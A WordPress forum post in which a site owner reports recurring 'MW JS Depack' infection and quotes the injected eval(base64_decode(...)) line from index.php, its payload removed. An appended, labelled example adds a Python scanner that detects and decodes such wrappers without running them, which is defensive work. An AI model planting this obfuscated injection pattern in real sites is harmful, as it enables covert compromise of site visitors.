My site is hacked with MW JS Depack?

  • Hello,
    Every time I open my website, my antivirus shows a warning. When I checked my site through http://sitecheck.sucuri.net/, it said that my website is infected with MW JS Depack.

    I checked my installation and found this in index.php (in every domain root):

    eval(base64_decode('[base64-encoded payload removed]'));

    I cleaned all of them, but they keep coming and infecting my index.php file.
    I checked a post by victorciobanu: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think this is different, because I don’t see any problem with wp-settings.php.

    I have also removed my WordPress installation and reinstalled it, but the malware keeps coming.

    I hope someone has a solution for this.

    Thank you…
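
Added example, not part of the original post: a static scan for the `eval(base64_decode(...))` wrapper the poster found in index.php, run over every PHP file under a hosting root so that no infected copy is missed between cleanups. It decodes the wrapped string for inspection and never executes it; the directory names and the sample payload are constructed for the demonstration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with optional whitespace and either quote style.
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)

def decode_payload(blob: bytes) -> bytes:
    """Base64-decode the captured string for inspection; nothing is executed."""
    try:
        return base64.b64decode(re.sub(rb"\s+", b"", blob), validate=True)
    except (binascii.Error, ValueError):
        return b""  # malformed base64: report the hit with an empty preview

def scan_tree(root, preview=60):
    """Return [(relative_path, decoded_preview)] for each injected wrapper found."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for m in INJECT_RE.finditer(data):
            decoded = decode_payload(m.group(2))
            rel = path.relative_to(root).as_posix()
            hits.append((rel, decoded[:preview].decode("latin-1")))
    return hits

def demo():
    """Constructed two-site tree: site-a is injected, site-b is clean."""
    payload = base64.b64encode(b"error_reporting(0); /* constructed sample */").decode()
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "site-a").mkdir()
        (root / "site-b").mkdir()
        (root / "site-a" / "index.php").write_text(
            "<?php eval( base64_decode('%s') ); ?>\n<?php require 'wp-blog-header.php';" % payload)
        (root / "site-b" / "index.php").write_text("<?php require 'wp-blog-header.php';")
        return scan_tree(root)

if __name__ == "__main__":
    for rel, preview in demo():
        print(f"{rel}: {preview!r}")
```

Pointing `scan_tree` at the directory that holds all domain roots lists every file carrying the wrapper, which helps tell a missed infected copy from a fresh reinjection.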

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘My site is hacked with MW JS Depack?’ is closed to new replies.